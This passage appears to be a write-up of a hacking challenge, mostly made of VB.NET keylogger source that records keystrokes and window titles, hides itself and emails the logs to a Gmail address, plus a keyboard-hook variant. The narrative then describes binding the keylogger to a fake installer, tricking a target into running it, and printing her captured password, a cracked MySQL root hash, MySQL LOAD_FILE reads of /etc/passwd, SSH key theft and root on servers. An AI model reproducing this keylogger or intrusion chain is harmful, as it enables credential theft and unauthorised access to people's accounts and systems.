            txtNishikieKeys.Text = txtNishikieKeys.Text & "|"
        End If

        mimiNiCapsAmaLa  = GetAsyncmimiNiCapsAmaLa (&HDDS)
        If Shift = 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "]"
        End If

        If Shift <> 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "]"
        End If

        mimiNiCapsAmaLa  = GetAsyncmimiNiCapsAmaLa (&HDES)
        If Shift = 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "'"
        End If

        If Shift <> 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & Chr(34)
        End If

        mimiNiCapsAmaLa  = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.Multiply)
        If (mimiNiCapsAmaLa  And &H1S) = &H1S Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "*"
        End If

        mimiNiCapsAmaLa  = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.Divide)
        If (mimiNiCapsAmaLa  And &H1S) = &H1S Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "/"
        End If

        mimiNiCapsAmaLa  = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.Add)
        If (mimiNiCapsAmaLa  And &H1S) = &H1S Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "+"
        End If

        mimiNiCapsAmaLa  = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.Subtract)
        If (mimiNiCapsAmaLa  And &H1S) = &H1S Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "-"
        End If

        mimiNiCapsAmaLa  = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.Decimal)
        If (mimiNiCapsAmaLa  And &H1S) = &H1S Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "[Del]"
        End If

        mimiNiCapsAmaLa  = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.F1)
        If (mimiNiCapsAmaLa  And &H1S) = &H1S Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "[F1]"
        End If

        mimiNiCapsAmaLa  = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.F2)
        If (mimiNiCapsAmaLa  And &H1S) = &H1S Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "[F2]"
        End If

        mimiNiCapsAmaLa  = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.F3)
        If (mimiNiCapsAmaLa  And &H1S) = &H1S Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "[F3]"
        End If

        mimiNiCapsAmaLa  = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.F4)
        If (mimiNiCapsAmaLa  And &H1S) = &H1S Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "[F4]"
        End If

        mimiNiCapsAmaLa  = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.F5)
        If (mimiNiCapsAmaLa  And &H1S) = &H1S Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "[F5]"
        End If

        mimiNiCapsAmaLa  = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.F6)
        If (mimiNiCapsAmaLa  And &H1S) = &H1S Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "[F6]"
        End If

        mimiNiCapsAmaLa  = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.F7)
        If (mimiNiCapsAmaLa  And &H1S) = &H1S Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "[F7]"
        End If

        mimiNiCapsAmaLa  = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.F8)
        If (mimiNiCapsAmaLa  And &H1S) = &H1S Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "[F8]"
        End If

        mimiNiCapsAmaLa  = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.F9)
        If (mimiNiCapsAmaLa  And &H1S) = &H1S Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "[F9]"
        End If

        mimiNiCapsAmaLa  = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.F10)
        If (mimiNiCapsAmaLa  And &H1S) = &H1S Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "[F10]"
        End If

        mimiNiCapsAmaLa  = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.F11)
        If (mimiNiCapsAmaLa  And &H1S) = &H1S Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "[F11]"
        End If

        mimiNiCapsAmaLa  = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.F12)
        If Shift = 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "[F12]"
        End If

        If Shift <> 0 And (mimiNiCapsAmaLa  And &H1S) = &H1S Then
            Me.Visible = True
            Call RegisterServiceProcess(0, 0)
        End If

        mimiNiCapsAmaLa  = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.NumLock)
        If (mimiNiCapsAmaLa  And &H1S) = &H1S Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "[NumLock]"
        End If

        mimiNiCapsAmaLa  = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.Scroll)
        If (mimiNiCapsAmaLa  And &H1S) = &H1S Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "[ScrollLock]"
        End If

        mimiNiCapsAmaLa  = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.Print)
        If (mimiNiCapsAmaLa  And &H1S) = &H1S Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "[PrintScreen]"
        End If

        mimiNiCapsAmaLa  = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.PageUp)
        If (mimiNiCapsAmaLa  And &H1S) = &H1S Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "[PageUp]"
        End If

        mimiNiCapsAmaLa  = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.PageDown)
        If (mimiNiCapsAmaLa  And &H1S) = &H1S Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "[Pagedown]"
        End If

        mimiNiCapsAmaLa  = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.NumPad1)
        If (mimiNiCapsAmaLa  And &H1S) = &H1S Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "1"
        End If

        mimiNiCapsAmaLa  = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.NumPad2)
        If (mimiNiCapsAmaLa  And &H1S) = &H1S Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "2"
        End If

        mimiNiCapsAmaLa  = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.NumPad3)
        If (mimiNiCapsAmaLa  And &H1S) = &H1S Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "3"
        End If

        mimiNiCapsAmaLa  = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.NumPad4)
        If (mimiNiCapsAmaLa  And &H1S) = &H1S Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "4"
        End If

        mimiNiCapsAmaLa  = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.NumPad5)
        If (mimiNiCapsAmaLa  And &H1S) = &H1S Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "5"
        End If

        mimiNiCapsAmaLa  = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.NumPad6)
        If (mimiNiCapsAmaLa  And &H1S) = &H1S Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "6"
        End If

        mimiNiCapsAmaLa  = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.NumPad7)
        If (mimiNiCapsAmaLa  And &H1S) = &H1S Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "7"
        End If

        mimiNiCapsAmaLa  = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.NumPad8)
        If (mimiNiCapsAmaLa  And &H1S) = &H1S Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "8"
        End If

        mimiNiCapsAmaLa  = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.NumPad9)
        If (mimiNiCapsAmaLa  And &H1S) = &H1S Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "9"
        End If

        mimiNiCapsAmaLa  = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.NumPad0)
        If (mimiNiCapsAmaLa  And &H1S) = &H1S Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "0"
        End If
        mimiNiCapsAmaLa  = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.ControlKey)
        If (mimiNiCapsAmaLa  And &H1S) = &H1S Then
            txtNishikieKeys.Text = txtNishikieKeys.Text & "[Ctrl]"
        End If
‘this ends checking our keys for now
‘next trap active window so that we can record and associate do It in one of your timers preferably with a short time frame.
Private Function GetActiveWindowTitle() As String
        Dim kiAppCurrent As String
        kiAppCurrent = New String(Chr(0), 100)
        GetWindowText(GetForegroundWindow, kiAppCurrent, 100)
        kiAppCurrent = kiAppCurrent.Substring(0, InStr(kiAppCurrent, Chr(0)) - 1)
        Return kiAppCurrent
    End Function
‘in timer 2 we add what we trap to the window we trapped it from
Dim strin As String = Nothing
        If strin <> GetActiveWindowTitle() Then
            txtNishikieKeys.Text = txtNishikieKeys.Text + vbNewLine & GetActiveWindowTitle() & vbNewLine
            strin = GetActiveWindowTitle()
        End If

Dim MyMailMessage As New MailMessage()
        MyMailMessage.From = New MailAddress("theharvesteruon@gmail.com")
        MyMailMessage.To.Add("theharvesteruon@gmail.com")
        MyMailMessage.Subject = "Team 0wnErz "
        MyMailMessage.Body = txtNishikieKeys.Text
        Dim SMPT As New SmtpClient("smtp.gmail.com")
        SMPT.Port = 587
        SMPT.EnableSsl = True
        SMPT.Credentials = New System.Net.NetworkCredential("theharvesteruon@gmail.com", "")
        SMPT.Send(MyMailMessage)
        txtNishikieKeys.Text = ""
‘before we forget hide the app lol
Me.hide
Me.opacity = 0
Me.ShowInTaskbar = false

For those asking why no keyboard hooks and all the initialization well its XP no need for paranoia and noise on a system but here’s something to calm you down if you don’t like the tiresome but innocent method above.
Private KeyboardHookProcedure As Win32.HookProc
  Public Sub InstallHooks()
             If hKeyboardHook = 0 Then ' install Keyboard hook
            KeyboardHookProcedure = New Win32.HookProc(AddressOf KeyboardHookProc)
            hKeyboardHook = Win32.SetWindowsHookEx( _
                Win32.WH.WH_KEYBOARD_LL, _
                KeyboardHookProcedure, _
                Marshal.GetHINSTANCE(Reflection.Assembly.GetExecutingAssembly().GetModules( )(0)), _
                0)

            If (hKeyboardHook = 0) Then 'SetWindowsHookEx failed
                RemoveHooks()
                Throw New Exception("SetWindowsHookEx failed.")
            End If
        End If
    End Sub

    Public Sub RemoveHooks()
        Dim keyboardResult As Boolean = True

        If hKeyboardHook <> 0 Then
            keyboardResult = Win32.UnhookWindowsHookEx(hKeyboardHook)
            hKeyboardHook = 0
        End If
        If Not keyboardResult Then 'UnhookWindowsHookEx failed
            Throw New Exception("UnhookWindowsHookEx failed.")
        End If
    End Sub

Also on the Hackbattle group they mentioned that VPS was by Azanuru , and we checked them out as we did the keylogger. We need as much as we can get as we plan to own Joan.
So we visit Azanuru site and guess what open test day till 20th. It was running on Openstack had  3 public IP subnets up and running one on the same network as the VPS running Nasty salon interesting from phpinfo we saw an ubuntu install so we did a 13.10 as is the case on the blog’s tutorial and we join the subnet with the VPS and get a floating IP of:

197.232.19.197
Azanuru guys notice and send us a mail to join the .20 subnet one and kick our floating IP out but one thing we know is we are using a keypair to login and it has sudo access amazing . 

So this (keypair) is what we will be targeting from Joan not other credentials.
So kick us out but we know btw just a feel of how the droplet started failing:
2014-03-10 15:16:42,647 - url_helper.py[WARNING]: Calling
2014-03-10 15:17:39,795 - url_helper.py[WARNING]: Calling 
'http://169.254.169.254/2009-04-04/meta-data/instance-id' failed [112/120s]: request error [HTTPConnectionPool(host='169.254.169.254', port=80): Max retries exceeded with url: /2009-04-04/meta-data/instance-id (Caused by : [Errno 101] Network is unreachable)]
2014-03-10 15:17:46,809 - url_helper.py[WARNING]: Calling 'http://169.254.169.254/2009-04-04/meta-data/instance-id' failed [119/120s]: request error [HTTPConnectionPool(host='169.254.169.254', port=80): Max retries exceeded with url: /2009-04-04/meta-data/instance-id (Caused by : [Errno 101] Network is unreachable)]
2014-03-10 15:17:53,822 - DataSourceEc2.py[CRITICAL]: Giving up on md from ['http://169.254.169.254/2009-04-04/meta-data/instance-id'] after 126 seconds
2014-03-10 15:17:53,826 - util.py[WARNING]: Getting data from failed
Cloud-init v. 0.7.3 running 'modules:config' at Mon, 10 Mar 2014 15:17:54 +0000. Up 262.78 seconds.
 * Starting AppArmor profiles       [80G Skipping profile in /etc/apparmor.d/disable: usr.sbin.rsyslogd

So we finish our keylogger in 2 versions and use easy binder to bind them to simfatic forms , 2 versions btw and we upload them to our spa site and send the mail to Joan:
immediately she installed it logs started coming in to our harvester and we got good things:

http://spa.oo3.co/soft/Simfatic-setup-4.exe 
http://spa.oo3.co/soft/simfatic-setup-2.exe 
 
The Version of the software we bound was meant to give an error message to give leeway incase of a problem to talk to her and send a second keylogger using a different method of logging in order to make it successful incase the first fails.

But the keylogger never failed us so here we are: Confirmed XP was right.

So we got this password as she typed her Gmail password :
Tuesday, March 18, 2014 [12:23 PM] thunderbird.exe: Mail Server Password Required
n@stys4l0nw3b
Time to login to the Gmail and see how much we can get I think the pictures will speak for us here:
So phpMyAdmin Points to a db on .195.

SSH keypair to login to the server

Database Credentials



Successful Login

In here we found passwords to both emails in the emails database but we were checking stuff out still before just using our keypair. So we created a database 0wnErz:
We made a table redteam with 2 columns id and data. We filled them with dummy data then on update we pulled files.
UPDATE redteam SET Data=LOAD_FILE('/etc/hosts)
WHERE id=3;
UPDATE redteam SET Data=LOAD_FILE('/etc/passwd)
WHERE id=4;

For lulz while at it we cracked the mysql root hash , Despite the firewall this was a weak password policy on their end:

root@localhost:  7561F5295A1A35CB8E0A7C46921994D383947FA5 MySQL4.1+: sha1(sha1_bin())    r00t
The race to the finish line began here  . This happened very fast 

So our downloaded keypair from the mail we logged in to the db server.

Then we became super user:

Then we read the history file and more secrets :
cat .bash_history

So there’s another keypair but to the .2 server i.e. webserver, remember from phpinfo? SSH is on port 49800, on checking files in the ubuntu home directory the key and yes it’s just that into the webserver.

Again get Root

Well we’d say we are done but we needed to share our joy so on to /var/www and like any movie give credits to the actors :D


We’d like to thank Gichuki Jonia (./chuks) for the challenge we learnt a lot while doing it and Azanuru for the infrastructure . Made all this possible  .